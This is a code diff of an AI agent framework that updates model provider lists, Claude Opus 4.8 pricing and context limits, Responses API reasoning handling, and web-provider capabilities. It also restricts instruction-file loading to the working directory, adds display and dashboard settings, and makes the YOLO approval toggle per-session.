Called after each turn. Should be non-blocking queue for
background processing if the backend has latency.
``messages`` is the OpenAI-style conversation message list as of the
completed turn, including any assistant tool calls and tool results.
Providers that do not need raw turn context can ignore it.
"""
@abstractmethod
+26 -3
View File
@@ -47,7 +47,7 @@ def _resolve_requests_verify() -> bool | str:
_PROVIDER_PREFIXES: frozenset[str] = frozenset({
"openrouter", "nous", "openai-codex", "copilot", "copilot-acp",
"gemini", "ollama-cloud", "zai", "kimi-coding", "kimi-coding-cn", "stepfun", "minimax", "minimax-oauth", "minimax-cn", "anthropic", "deepseek",
"opencode-zen", "opencode-go", "ai-gateway", "kilocode", "alibaba", "novita",
"opencode-zen", "opencode-go", "kilocode", "alibaba", "novita",
"qwen-oauth",
"xiaomi",
"arcee",
@@ -59,7 +59,7 @@ _PROVIDER_PREFIXES: frozenset[str] = frozenset({
"glm", "z-ai", "z.ai", "zhipu", "github", "github-copilot",
"github-models", "kimi", "moonshot", "kimi-cn", "moonshot-cn", "claude", "deep-seek",
"ollama",
"stepfun", "opencode", "zen", "go", "vercel", "kilo", "dashscope", "aliyun", "qwen",
"stepfun", "opencode", "zen", "go", "kilo", "dashscope", "aliyun", "qwen",
"mimo", "xiaomi-mimo",
"tencent", "tokenhub", "tencent-cloud", "tencentmaas",
"arcee-ai", "arceeai",
@@ -141,6 +141,8 @@ DEFAULT_CONTEXT_LENGTHS = {
# fuzzy-match collisions (e.g. "anthropic/claude-sonnet-4" is a
# substring of "anthropic/claude-sonnet-4.6").
# OpenRouter-prefixed models resolve via OpenRouter live API or models.dev.
"claude-opus-4-8": 1000000,
"claude-opus-4.8": 1000000,
"claude-opus-4-7": 1000000,
"claude-opus-4.7": 1000000,
"claude-opus-4-6": 1000000,
@@ -911,12 +913,33 @@ def parse_context_limit_from_error(error_msg: str) -> Optional[int]:
return None
def get_context_length_from_provider_error(
error_msg: str,
current_context_length: int,
) -> Optional[int]:
"""Return a provider-reported lower context limit, if one is present.
Context-overflow recovery must not invent a new model window size. Some
providers only say that the input exceeds the context window without
reporting the actual maximum. In that case callers should keep the
configured context length and try compression only, rather than stepping
down through guessed probe tiers (1M 256K 128K ...).
"""
parsed_limit = parse_context_limit_from_error(error_msg)
if parsed_limit is None:
return None
if parsed_limit < current_context_length:
return parsed_limit
return None
def parse_available_output_tokens_from_error(error_msg: str) -> Optional[int]:
"""Detect an "output cap too large" error and return how many output tokens are available.
Background two distinct context errors exist:
1. "Prompt too long" the INPUT itself exceeds the context window.
Fix: compress history and/or halve context_length.
Fix: compress history, and only reduce context_length if the
provider explicitly reports the actual lower limit.
2. "max_tokens too large" input is fine, but input + requested_output > window.
Fix: reduce max_tokens (the output cap) for this call.
Do NOT touch context_length the window hasn't shrunk.
-1
View File
@@ -158,7 +158,6 @@ PROVIDER_TO_MODELS_DEV: Dict[str, str] = {
"alibaba": "alibaba",
"qwen-oauth": "alibaba",
"copilot": "github-copilot",
"ai-gateway": "vercel",
"opencode-zen": "opencode",
"opencode-go": "opencode-go",
"kilocode": "kilo",
+2 -3
View File
@@ -610,7 +610,7 @@ WSL_ENVIRONMENT_HINT = (
# misleading — the agent should only see the machine it can actually touch.
_REMOTE_TERMINAL_BACKENDS = frozenset({
"docker", "singularity", "modal", "daytona", "ssh",
"vercel_sandbox", "managed_modal",
"managed_modal",
})
@@ -624,7 +624,6 @@ _BACKEND_FALLBACK_DESCRIPTIONS: dict[str, str] = {
"modal": "a Modal sandbox (Linux)",
"managed_modal": "a managed Modal sandbox (Linux)",
"daytona": "a Daytona workspace (Linux)",
"vercel_sandbox": "a Vercel sandbox (Linux)",
"ssh": "a remote host reached over SSH (likely Linux)",
}
@@ -738,7 +737,7 @@ def build_environment_hints() -> str:
and a Windows-only note that `terminal` shells out to bash, not
PowerShell).
- For **remote / sandbox** terminal backends (docker, singularity,
modal, daytona, ssh, vercel_sandbox): host info is **suppressed**
modal, daytona, ssh): host info is **suppressed**
because the agent's tools can't touch the host only the backend
matters. A live probe inside the backend reports its OS, user, $HOME,
and cwd. Falls back to a static summary if the probe fails.
+8 -13
View File
@@ -406,19 +406,14 @@ def redact_sensitive_text(text: str, *, force: bool = False, code_file: bool = F
if "eyJ" in text:
text = _JWT_RE.sub(lambda m: _mask_token(m.group(0)), text)
# URL userinfo (http(s)://user:pass@host) — redact for non-DB schemes.
# DB schemes are handled above by _DB_CONNSTR_RE.
if "://" in text:
text = _redact_url_userinfo(text)
# URL query params containing opaque tokens (?access_token=…&code=…)
if "?" in text:
text = _redact_url_query_params(text)
# HTTP access logs can contain relative request targets with query params
# and no URL scheme, e.g. `"POST /hook?password=... HTTP/1.1"`.
if "?" in text and "=" in text and _has_http_method_substring(text):
text = _redact_http_request_target_query_params(text)
# NOTE: Web-URL redaction (query params + userinfo + HTTP access-log
# request targets) is intentionally OFF. Many legitimate workflows pass
# opaque tokens through query strings — magic-link checkouts, OAuth
# callbacks the agent is meant to follow, pre-signed share URLs — and
# blanket-redacting param values by name breaks those skills mid-flow.
# Known credential shapes (sk-, ghp_, JWTs, etc.) inside URLs are still
# caught by _PREFIX_RE and _JWT_RE above. DB connection-string passwords
# are still caught by _DB_CONNSTR_RE.
# Form-urlencoded bodies (only triggers on clean k=v&k=v inputs).
if "&" in text and "=" in text:
+1 -1
View File
@@ -258,7 +258,7 @@ def emit_stream_drop(
except Exception:
pass
try:
agent._emit_status(
agent._buffer_status(
f"⚠️ {provider} stream {kind} ({type(error).__name__}){_suffix} "
f"— reconnecting, retry {attempt}/{max_attempts}"
)
+48 -2
View File
@@ -45,6 +45,15 @@ _COMMAND_TOOLS = {"terminal"}
# Prevents scanning all the way to / for deeply nested paths.
_MAX_ANCESTOR_WALK = 5
def _is_ancestor_or_same(a: Path, b: Path) -> bool:
"""Check if *a* is the same as or an ancestor of *b* (parent directory check)."""
try:
b.relative_to(a)
return True
except ValueError:
return False
class SubdirectoryHintTracker:
"""Track which directories the agent visits and load hints on first access.
@@ -158,7 +167,13 @@ class SubdirectoryHintTracker:
self._add_path_candidate(token, candidates)
def _is_valid_subdir(self, path: Path) -> bool:
"""Check if path is a valid directory to scan for hints."""
"""Check if path is a valid directory to scan for hints.
Only allow subdirectories within the working directory tree.
This prevents loading AGENTS.md from outside the active workspace
(e.g. ~/.codex/AGENTS.md, ~/.claude/CLAUDE.md), which causes
cross-agent context contamination and instruction mixup.
"""
try:
if not path.is_dir():
return False
@@ -166,12 +181,43 @@ class SubdirectoryHintTracker:
return False
if path in self._loaded_dirs:
return False
# Reject paths outside the working directory tree.
# path.resolve() may differ from working_dir.resolve() due to symlinks,
# but path.is_relative_to(working_dir) handles both absolute and
# symlinked paths correctly on Python 3.9+.
try:
if not path.is_relative_to(self.working_dir):
return False
except (OSError, ValueError):
# Older Python or path resolution error — fall back to parent
# check as a best-effort safeguard.
if not _is_ancestor_or_same(self.working_dir, path):
return False
return True
def _load_hints_for_directory(self, directory: Path) -> Optional[str]:
"""Load hint files from a directory. Returns formatted text or None."""
"""Load hint files from a directory. Returns formatted text or None.
Only loads hints from directories within the working directory tree.
"""
self._loaded_dirs.add(directory)
# Reject paths outside the working directory tree.
try:
if not directory.is_relative_to(self.working_dir):
logger.debug(
"Skipping hint files in %s — outside working_dir %s",
directory, self.working_dir,
)
return None
except (OSError, ValueError):
if not _is_ancestor_or_same(self.working_dir, directory):
logger.debug(
"Skipping hint files in %s — outside working_dir %s",
directory, self.working_dir,
)
return None
found_hints = []
for filename in _HINT_FILENAMES:
hint_path = directory / filename
+68 -4
View File
@@ -17,16 +17,39 @@ class ResponsesApiTransport(ProviderTransport):
Wraps the functions extracted into codex_responses_adapter.py (PR 1).
"""
# Issuer kind of the most recent build_kwargs / convert_messages call.
# Used as a fallback when normalize_response is invoked without an
# explicit ``issuer_kind`` kwarg, so reasoning items captured from a
# response are stamped with the endpoint that minted them. Plain class
# attribute default; mutated on the instance, not the class.
_last_issuer_kind: Optional[str] = None
@property
def api_mode(self) -> str:
return "codex_responses"
def _resolve_issuer_kind(self, params: Dict[str, Any]) -> str:
"""Classify the current Responses endpoint from transport params."""
from agent.codex_responses_adapter import _classify_responses_issuer
return _classify_responses_issuer(
is_xai_responses=bool(params.get("is_xai_responses")),
is_github_responses=bool(params.get("is_github_responses")),
is_codex_backend=bool(params.get("is_codex_backend")),
base_url=params.get("base_url"),
)
def convert_messages(self, messages: List[Dict[str, Any]], **kwargs) -> Any:
"""Convert OpenAI chat messages to Responses API input items."""
from agent.codex_responses_adapter import _chat_messages_to_responses_input
issuer = self._resolve_issuer_kind(kwargs)
self._last_issuer_kind = issuer
return _chat_messages_to_responses_input(
messages,
is_xai_responses=bool(kwargs.get("is_xai_responses")),
replay_encrypted_reasoning=bool(
kwargs.get("replay_encrypted_reasoning", True)
),
current_issuer_kind=issuer,
)
def convert_tools(self, tools: List[Dict[str, Any]]) -> Any:
@@ -79,6 +102,17 @@ class ResponsesApiTransport(ProviderTransport):
is_github_responses = params.get("is_github_responses", False)
is_codex_backend = params.get("is_codex_backend", False)
is_xai_responses = params.get("is_xai_responses", False)
replay_encrypted_reasoning = bool(
params.get("replay_encrypted_reasoning", True)
)
# Resolve the issuing endpoint for this call. Stashed on the
# transport so normalize_response can stamp it onto reasoning
# items captured from the response, and passed to the input
# converter so foreign-issuer reasoning blocks in history are
# dropped before the API rejects them.
issuer_kind = self._resolve_issuer_kind(params)
self._last_issuer_kind = issuer_kind
# Resolve reasoning effort
reasoning_effort = "medium"
@@ -94,17 +128,27 @@ class ResponsesApiTransport(ProviderTransport):
reasoning_effort = _effort_clamp.get(reasoning_effort, reasoning_effort)
response_tools = _responses_tools(tools)
# ``tools`` MUST be omitted entirely when there are no functions to
# expose: the openai SDK's ``responses.stream()`` / ``responses.parse()``
# eagerly call ``_make_tools(tools)`` which does ``for tool in tools``
# without a None guard, so passing ``tools=None`` raises
# ``TypeError: 'NoneType' object is not iterable`` before any HTTP
# request is issued (openai==2.24.0). Reported for the
# ``openai-codex`` / ``gpt-5.5`` combo on chatgpt.com/backend-api/codex
# (#32892) when the agent runs without external tools registered.
kwargs = {
"model": model,
"instructions": instructions,
"input": _chat_messages_to_responses_input(
payload_messages,
is_xai_responses=is_xai_responses,
replay_encrypted_reasoning=replay_encrypted_reasoning,
current_issuer_kind=issuer_kind,
),
"tools": response_tools,
"store": False,
}
if response_tools:
kwargs["tools"] = response_tools
kwargs["tool_choice"] = "auto"
kwargs["parallel_tool_calls"] = True
@@ -121,7 +165,9 @@ class ResponsesApiTransport(ProviderTransport):
# replay them on subsequent turns for cross-turn coherence.
# See agent/codex_responses_adapter._chat_messages_to_responses_input
# for the May 2026 reversal of the earlier suppression gate.
kwargs["include"] = ["reasoning.encrypted_content"]
kwargs["include"] = (
["reasoning.encrypted_content"] if replay_encrypted_reasoning else []
)
# xAI rejects `reasoning.effort` on grok-4 / grok-4-fast / grok-3
# / grok-code-fast / grok-4.20-0309-* with HTTP 400 even though
# those models reason natively. Only send the effort dial when
@@ -136,7 +182,9 @@ class ResponsesApiTransport(ProviderTransport):
kwargs["reasoning"] = github_reasoning
else:
kwargs["reasoning"] = {"effort": reasoning_effort, "summary": "auto"}
kwargs["include"] = ["reasoning.encrypted_content"]
kwargs["include"] = (
["reasoning.encrypted_content"] if replay_encrypted_reasoning else []
)
elif not is_github_responses and not is_xai_responses:
kwargs["include"] = []
@@ -144,6 +192,17 @@ class ResponsesApiTransport(ProviderTransport):
if request_overrides:
kwargs.update(request_overrides)
# xAI Responses API rejects ``service_tier`` (HTTP 400 "Argument not
# supported: service_tier") — hit when ``/fast`` priority-processing
# mode lingers from a prior model in the same session, or when a
# user explicitly sets ``agent.service_tier`` in config.yaml. The
# main-loop guard (``resolve_fast_mode_overrides`` only returns
# ``service_tier`` for OpenAI fast-eligible models) doesn't cover
# those leak paths, so strip defensively when targeting xAI. See
# #28490 for the original report.
if is_xai_responses:
kwargs.pop("service_tier", None)
# Forward per-request timeout to the SDK so OpenAI/Anthropic clients
# honor it. Without this, ``providers.<id>.request_timeout_seconds``
# is silently dropped on the main agent Codex path while the
@@ -213,8 +272,13 @@ class ResponsesApiTransport(ProviderTransport):
_normalize_codex_response,
)
# Issuer for this response = explicit kwarg if the caller knows it,
# otherwise the stash from the matching build_kwargs/convert_messages
# call. Either way it gets stamped onto reasoning items so future
# turns can detect a model swap and drop foreign-issuer blobs.
issuer_kind = kwargs.get("issuer_kind") or self._last_issuer_kind
# _normalize_codex_response returns (SimpleNamespace, finish_reason_str)
msg, finish_reason = _normalize_codex_response(response)
msg, finish_reason = _normalize_codex_response(response, issuer_kind=issuer_kind)
tool_calls = None
if msg and msg.tool_calls:
+30 -2
View File
@@ -83,6 +83,34 @@ _UTC_NOW = lambda: datetime.now(timezone.utc)
# Official docs snapshot entries. Models whose published pricing and cache
# semantics are stable enough to encode exactly.
_OFFICIAL_DOCS_PRICING: Dict[tuple[str, str], PricingEntry] = {
# ── Anthropic Claude 4.8 ─────────────────────────────────────────────
# Same $5/$25 base pricing as 4.6/4.7. Fast-mode variant is a separate
# model ID with 2x premium (vs the 6x premium on older Opus generations).
# Source: https://openrouter.ai/anthropic/claude-opus-4.8
(
"anthropic",
"claude-opus-4-8",
): PricingEntry(
input_cost_per_million=Decimal("5.00"),
output_cost_per_million=Decimal("25.00"),
cache_read_cost_per_million=Decimal("0.50"),
cache_write_cost_per_million=Decimal("6.25"),
source="official_docs_snapshot",
source_url="https://platform.claude.com/docs/en/about-claude/pricing",
pricing_version="anthropic-pricing-2026-05",
),
(
"anthropic",
"claude-opus-4-8-fast",
): PricingEntry(
input_cost_per_million=Decimal("10.00"),
output_cost_per_million=Decimal("50.00"),
cache_read_cost_per_million=Decimal("1.00"),
cache_write_cost_per_million=Decimal("12.50"),
source="official_docs_snapshot",
source_url="https://openrouter.ai/anthropic/claude-opus-4.8-fast",
pricing_version="anthropic-pricing-2026-05",
),
# ── Anthropic Claude 4.7 ─────────────────────────────────────────────
# Opus 4.5/4.6/4.7 share $5/$25 pricing (new tokenizer, up to 35% more
# tokens for the same text).
@@ -711,8 +739,8 @@ def normalize_usage(
output_tokens = _to_int(getattr(response_usage, "completion_tokens", 0))
details = getattr(response_usage, "prompt_tokens_details", None)
# Primary: OpenAI-style prompt_tokens_details. Fallback: Anthropic-style
# top-level fields that some OpenAI-compatible proxies (OpenRouter, Vercel
# AI Gateway, Cline) expose when routing Claude models — without this
# top-level fields that some OpenAI-compatible proxies (OpenRouter, Cline)
# expose when routing Claude models — without this
# fallback, cache writes are undercounted as 0 and cache reads can be
# missed when the proxy only surfaces them at the top level.
# Port of cline/cline#10266.
+6 -42
View File
@@ -61,14 +61,14 @@ from typing import Any, Dict, List
class WebSearchProvider(abc.ABC):
"""Abstract base class for a web search/extract/crawl backend.
"""Abstract base class for a web search/extract backend.
Subclasses must implement :meth:`is_available` and at least one of
:meth:`search` / :meth:`extract` / :meth:`crawl`. The
:meth:`supports_search` / :meth:`supports_extract` / :meth:`supports_crawl`
capability flags let the registry route each tool call to the right
provider, and let multi-capability providers (Firecrawl, Tavily, Exa,
) advertise multiple capabilities from a single class.
:meth:`search` / :meth:`extract`. The :meth:`supports_search` /
:meth:`supports_extract` capability flags let the registry route each
tool call to the right provider, and let multi-capability providers
(Firecrawl, Tavily, Exa, ) advertise multiple capabilities from a
single class.
"""
@property
@@ -113,22 +113,6 @@ class WebSearchProvider(abc.ABC):
"""
return False
def supports_crawl(self) -> bool:
"""Return True if this provider implements :meth:`crawl`.
Crawl differs from extract in that the agent provides a *seed URL*
and the provider walks linked pages on its own useful for
documentation sites where the agent doesn't know all relevant
URLs upfront. Tavily is the only built-in backend that natively
crawls today; Firecrawl provides a similar capability that we
don't currently surface as a tool.
Providers that don't crawl should leave this as False; the
dispatcher in :func:`tools.web_tools.web_crawl_tool` will fall
back to its auxiliary-model summarization path.
"""
return False
def search(self, query: str, limit: int = 5) -> Dict[str, Any]:
"""Execute a web search.
@@ -173,26 +157,6 @@ class WebSearchProvider(abc.ABC):
f"{self.name} does not support extract (override supports_extract)"
)
def crawl(self, url: str, **kwargs: Any) -> Any:
"""Crawl a seed URL and return results.
Override when :meth:`supports_crawl` returns True. The default
raises NotImplementedError; callers should gate on
:meth:`supports_crawl` before calling.
Return shape: ``{"results": [{"url": str, "title": str,
"content": str, ...}, ...]}`` matching what
:func:`tools.web_tools.web_crawl_tool` post-processing expects.
Implementations MAY be ``async def``.
``kwargs`` may carry forward-compat fields (e.g. ``max_depth``,
``include_domains``) implementations should ignore unknown keys.
"""
raise NotImplementedError(
f"{self.name} does not support crawl (override supports_crawl)"
)
def get_setup_schema(self) -> Dict[str, Any]:
"""Return provider metadata for the ``hermes tools`` picker.
+6 -23
View File
@@ -11,7 +11,7 @@ Active selection
----------------
The active provider is chosen by configuration with this precedence:
1. ``web.search_backend`` / ``web.extract_backend`` / ``web.crawl_backend``
1. ``web.search_backend`` / ``web.extract_backend``
(per-capability override).
2. ``web.backend`` (shared fallback).
3. If exactly one capability-eligible provider is registered AND available,
@@ -24,10 +24,10 @@ The active provider is chosen by configuration with this precedence:
5. Otherwise ``None`` the tool surfaces a helpful error pointing at
``hermes tools``.
The capability filter (``supports_search`` / ``supports_extract`` /
``supports_crawl``) is applied at every step so a search-only provider
(``brave-free``) configured as ``web.extract_backend`` correctly falls
through to an extract-capable backend.
The capability filter (``supports_search`` / ``supports_extract``) is
applied at every step so a search-only provider (``brave-free``)
configured as ``web.extract_backend`` correctly falls through to an
extract-capable backend.
"""
from __future__ import annotations
@@ -131,7 +131,7 @@ _LEGACY_PREFERENCE = (
def _resolve(configured: Optional[str], *, capability: str) -> Optional[WebSearchProvider]:
"""Resolve the active provider for a capability ("search" | "extract" | "crawl").
"""Resolve the active provider for a capability ("search" | "extract").
Resolution rules (in order):
@@ -168,8 +168,6 @@ def _resolve(configured: Optional[str], *, capability: str) -> Optional[WebSearc
return bool(p.supports_search())
if capability == "extract":
return bool(p.supports_extract())
if capability == "crawl":
return bool(p.supports_crawl())
return False
def _is_available_safe(p: WebSearchProvider) -> bool:
@@ -241,21 +239,6 @@ def get_active_extract_provider() -> Optional[WebSearchProvider]:
return _resolve(explicit, capability="extract")
def get_active_crawl_provider() -> Optional[WebSearchProvider]:
"""Resolve the currently-active web crawl provider.
Reads ``web.crawl_backend`` (preferred) or ``web.backend`` (shared
fallback) from config.yaml; falls back per the module docstring.
Crawl is a niche capability among built-in providers only Tavily and
Firecrawl implement it. Callers should expect ``None`` and fall back to
a different strategy (e.g. summarize-via-LLM) when neither is
configured.
"""
explicit = _read_config_key("web", "crawl_backend") or _read_config_key("web", "backend")
return _resolve(explicit, capability="crawl")
def _reset_for_tests() -> None:
"""Clear the registry. **Test-only.**"""
with _lock:
+68 -1
View File
@@ -29,7 +29,6 @@ model:
# "arcee" - Arcee AI Trinity models (requires: ARCEEAI_API_KEY)
# "ollama-cloud" - Ollama Cloud (requires: OLLAMA_API_KEY — https://ollama.com/settings)
# "kilocode" - KiloCode gateway (requires: KILOCODE_API_KEY)
# "ai-gateway" - Vercel AI Gateway (requires: AI_GATEWAY_API_KEY)
# "azure-foundry" - Microsoft Foundry / Azure OpenAI (API key or Entra ID)
# "lmstudio" - LM Studio local server (optional: LM_API_KEY, defaults to http://127.0.0.1:1234/v1)
#
@@ -917,6 +916,15 @@ display:
# Toggle at runtime with /verbose in the CLI
tool_progress: all
# Per-platform defaults can be quieter than the global setting. Telegram
# tunes for mobile: tool_progress and busy_ack_detail default off (no
# per-tool breadcrumb stream, no "iteration 21/60" debug detail in busy
# acks or heartbeats), but interim_assistant_messages and
# long_running_notifications STAY ON so the user has real signal between
# turn start and final answer (mid-turn assistant commentary + a single
# edit-in-place "⏳ Working — N min" heartbeat). Override under
# display.platforms.telegram.
# Auto-cleanup of temporary progress bubbles after the final response lands.
# On platforms that support message deletion (currently Telegram), this
# removes the tool-progress bubble, "⏳ Still working..." notices, and
@@ -940,6 +948,22 @@ display:
# false: Only send the final response
interim_assistant_messages: true
# Gateway-only long-running status heartbeats.
# When false, the platform does not receive periodic "⏳ Working — N min"
# notifications even if agent.gateway_notify_interval is non-zero. The
# heartbeat edits a single message in place (where the adapter supports
# editing) instead of posting a new bubble each interval.
# Default: true everywhere, including Telegram (silent agents are worse
# than a single edit-in-place heartbeat).
long_running_notifications: true
# Include detailed iteration/tool/status context in busy acknowledgments
# and long-running heartbeats. When true, busy acks show "iteration 21/60,
# terminal, 10 min" and the heartbeat shows "⏳ Working — 12 min,
# iteration 21/60, terminal". When false (Telegram default), both stay
# terse: "Interrupting current task" and "⏳ Working — 12 min, terminal".
busy_ack_detail: true
# What Enter does when Hermes is already busy (CLI and gateway platforms).
# interrupt: Interrupt the current run and redirect Hermes (default)
# queue: Queue your message for the next turn
@@ -1098,3 +1122,46 @@ display:
# - command: "~/.hermes/agent-hooks/log-orchestration.sh"
#
# hooks_auto_accept: false
# =============================================================================
# Web Dashboard
# =============================================================================
# OAuth gate configuration for `hermes dashboard --host <non-loopback>`.
# The bundled Nous Portal plugin reads these on startup; settings here are
# the canonical surface. Each can be overridden by an environment variable:
#
# dashboard.oauth.client_id <- HERMES_DASHBOARD_OAUTH_CLIENT_ID
# dashboard.oauth.portal_url <- HERMES_DASHBOARD_PORTAL_URL
# dashboard.public_url <- HERMES_DASHBOARD_PUBLIC_URL
#
# Env wins when set to a non-empty value. This is what Fly.io's platform-
# secret injection uses to push per-deploy client_ids without needing to
# bake a config.yaml into the image. Empty env values are treated as unset
# so a provisioned-but-not-populated secret can't shadow a valid entry here.
#
# Local dev / on-prem deploys should typically set these via config.yaml
# (the ~/.hermes/.env file is reserved for API keys and secrets).
#
# dashboard:
# oauth:
# client_id: "" # agent:{instance_id}; Portal provisions this at deploy
# portal_url: "" # blank → default https://portal.nousresearch.com
#
# # Force the absolute base URL the OAuth callback (and any other public
# # URL the dashboard hands to external systems) is built from. Set this
# # for deploys behind reverse proxies that don't reliably forward
# # X-Forwarded-Host / X-Forwarded-Proto / X-Forwarded-Prefix (manual
# # nginx setups, on-prem ingresses, custom-domain Fly deploys without
# # full proxy header chains).
# #
# # When set, the value is the complete authority: scheme + host +
# # optional path prefix (e.g. "https://example.com/hermes"). The OAuth
# # callback URL becomes "<public_url>/auth/callback" — X-Forwarded-Prefix
# # is IGNORED on this code path because the operator has explicitly
# # declared the public URL and we no longer need to guess.
# #
# # Leave empty to use the existing proxy-header reconstruction (the
# # default — works on Fly.io out of the box).
# #
# # public_url: "https://example.com/hermes"
+276 -51
View File
@@ -168,7 +168,7 @@ from hermes_cli.browser_connect import (
try_launch_chrome_debug,
)
from hermes_cli.env_loader import load_hermes_dotenv
from utils import base_url_host_matches, is_truthy_value
from utils import base_url_host_matches
_hermes_home = get_hermes_home()
_project_env = Path(__file__).parent / '.env'
@@ -562,13 +562,12 @@ def load_cli_config() -> Dict[str, Any]:
"singularity_image": "TERMINAL_SINGULARITY_IMAGE",
"modal_image": "TERMINAL_MODAL_IMAGE",
"daytona_image": "TERMINAL_DAYTONA_IMAGE",
"vercel_runtime": "TERMINAL_VERCEL_RUNTIME",
# SSH config
"ssh_host": "TERMINAL_SSH_HOST",
"ssh_user": "TERMINAL_SSH_USER",
"ssh_port": "TERMINAL_SSH_PORT",
"ssh_key": "TERMINAL_SSH_KEY",
# Container resource config (docker, singularity, modal, daytona, vercel_sandbox -- ignored for local/ssh)
# Container resource config (docker, singularity, modal, daytona -- ignored for local/ssh)
"container_cpu": "TERMINAL_CONTAINER_CPU",
"container_memory": "TERMINAL_CONTAINER_MEMORY",
"container_disk": "TERMINAL_CONTAINER_DISK",
@@ -577,6 +576,8 @@ def load_cli_config() -> Dict[str, Any]:
"docker_env": "TERMINAL_DOCKER_ENV",
"docker_mount_cwd_to_workspace": "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE",
"docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
"docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
"docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
"sandbox_dir": "TERMINAL_SANDBOX_DIR",
# Persistent shell (non-local backends)
"persistent_shell": "TERMINAL_PERSISTENT_SHELL",
@@ -3748,7 +3749,7 @@ class HermesCLI:
percent_label = f"{percent}%" if percent is not None else "--"
duration_label = snapshot["duration"]
yolo_active = bool(os.getenv("HERMES_YOLO_MODE"))
yolo_active = self._is_session_yolo_active()
if width < 52:
text = f"{snapshot['model_short']} · {duration_label}"
if yolo_active:
@@ -3809,7 +3810,7 @@ class HermesCLI:
# line and produce duplicated status bar rows over long sessions.
width = self._get_tui_terminal_width()
duration_label = snapshot["duration"]
yolo_active = bool(os.getenv("HERMES_YOLO_MODE"))
yolo_active = self._is_session_yolo_active()
if width < 52:
frags = [
@@ -6908,6 +6909,7 @@ class HermesCLI:
pass
# Switch to the new session
self._transfer_session_yolo(self.session_id, new_session_id)
self.session_id = new_session_id
self.session_start = now
self._pending_title = None
@@ -7155,11 +7157,13 @@ class HermesCLI:
* ``sys.platform == "win32"`` native Windows console (ConPTY /
win32_input) does not support the modal reliably.
* Called from a non-main thread the prompt_toolkit event loop only
runs on the main thread; key bindings can't fire from a daemon
thread (same rationale as the ``_prompt_text_input`` thread guard
in PR #23454).
* ``self._app`` is not set unit tests / non-interactive contexts.
On non-Windows platforms the modal itself is still safe from the
``process_loop`` daemon thread as long as the main-thread event loop
owns the prompt_toolkit buffer mutations. When we are off the main
thread, schedule the modal snapshot / restore work on ``self._app.loop``
via ``call_soon_threadsafe`` and keep the queue-based response path.
"""
import threading
import time as _time
@@ -7180,33 +7184,62 @@ class HermesCLI:
if sys.platform == "win32":
return self._prompt_text_input("Choice [1/2/3]: ")
# Mirror the thread-aware guard from _prompt_text_input (PR #23454):
# run_in_terminal and the modal queue both depend on the main-thread
# event loop. From a daemon thread the modal key bindings never fire.
if threading.current_thread() is not threading.main_thread():
try:
app_loop = self._app.loop
except Exception:
app_loop = None
in_main_thread = threading.current_thread() is threading.main_thread()
if not in_main_thread and app_loop is None:
return self._prompt_text_input("Choice [1/2/3]: ")
response_queue = queue.Queue()
self._capture_modal_input_snapshot()
self._slash_confirm_state = {
"title": title,
"detail": detail,
"choices": choices,
"selected": 0,
"response_queue": response_queue,
}
self._slash_confirm_deadline = _time.monotonic() + timeout
self._invalidate()
def _setup_modal() -> None:
self._capture_modal_input_snapshot()
self._slash_confirm_state = {
"title": title,
"detail": detail,
"choices": choices,
"selected": 0,
"response_queue": response_queue,
}
self._slash_confirm_deadline = _time.monotonic() + timeout
self._invalidate()
def _teardown_modal() -> None:
self._slash_confirm_state = None
self._slash_confirm_deadline = 0
self._restore_modal_input_snapshot()
self._invalidate()
def _run_on_app_loop(fn) -> bool:
if in_main_thread or app_loop is None:
fn()
return True
ready = threading.Event()
def _wrapped() -> None:
try:
fn()
finally:
ready.set()
try:
app_loop.call_soon_threadsafe(_wrapped)
except Exception:
return False
return ready.wait(timeout=5)
if not _run_on_app_loop(_setup_modal):
return self._prompt_text_input("Choice [1/2/3]: ")
_last_countdown_refresh = _time.monotonic()
try:
while True:
try:
result = response_queue.get(timeout=1)
self._slash_confirm_state = None
self._slash_confirm_deadline = 0
self._restore_modal_input_snapshot()
self._invalidate()
_run_on_app_loop(_teardown_modal)
return result
except queue.Empty:
remaining = self._slash_confirm_deadline - _time.monotonic()
@@ -7218,10 +7251,7 @@ class HermesCLI:
self._invalidate()
finally:
if self._slash_confirm_state is not None:
self._slash_confirm_state = None
self._slash_confirm_deadline = 0
self._restore_modal_input_snapshot()
self._invalidate()
_run_on_app_loop(_teardown_modal)
return None
def _submit_slash_confirm_response(self, value: str | None) -> None:
@@ -7559,8 +7589,19 @@ class HermesCLI:
parts = cmd_original.split(None, 1) # split off '/model'
raw_args = parts[1].strip() if len(parts) > 1 else ""
# Parse --provider and --global flags
model_input, explicit_provider, persist_global = parse_model_flags(raw_args)
# Parse --provider, --global, and --refresh flags
model_input, explicit_provider, persist_global, force_refresh = parse_model_flags(raw_args)
# --refresh: wipe the on-disk picker cache before building the
# provider list. Forces a live re-fetch of every authed provider's
# /v1/models endpoint on this open.
if force_refresh:
try:
from hermes_cli.models import clear_provider_models_cache
clear_provider_models_cache()
_cprint(" Cleared model picker cache. Refreshing...")
except Exception:
pass
# Single inventory context — replaces the inline config-slice the
# dashboard / TUI used to duplicate. Overlay live session state
@@ -7599,6 +7640,7 @@ class HermesCLI:
_cprint("")
_cprint(" /model <name> switch model")
_cprint(" /model --provider <slug> switch provider")
_cprint(" /model --refresh re-fetch live model lists")
return
self._open_model_picker(
@@ -9580,20 +9622,92 @@ class HermesCLI:
}
_cprint(labels.get(self.tool_progress_mode, ""))
def _toggle_yolo(self):
"""Toggle YOLO mode — skip all dangerous command approval prompts."""
import os
from hermes_cli.colors import Colors as _Colors
def _transfer_session_yolo(self, old_session_id: str, new_session_id: str) -> None:
"""Move YOLO bypass state from an old session key to a new one.
current = is_truthy_value(os.environ.get("HERMES_YOLO_MODE"))
if current:
os.environ.pop("HERMES_YOLO_MODE", None)
Called whenever ``self.session_id`` is reassigned mid-run ``/branch``
forks into a new session, and auto-compression rotates the agent's
session id into a fresh continuation session. Without this transfer
the user's ``/yolo ON`` toggle would silently revert on the very next
turn (the same UX failure mode that motivated this entire fix), since
``_session_yolo`` is keyed by session id.
Mirrors ``tui_gateway/server.py`` (~line 1297-1305) which performs the
same transfer for the TUI's session-rename path. No-op when YOLO
wasn't enabled or when the ids match.
"""
if not old_session_id or not new_session_id or old_session_id == new_session_id:
return
try:
from tools.approval import (
disable_session_yolo,
enable_session_yolo,
is_session_yolo_enabled,
)
except Exception:
return
if is_session_yolo_enabled(old_session_id):
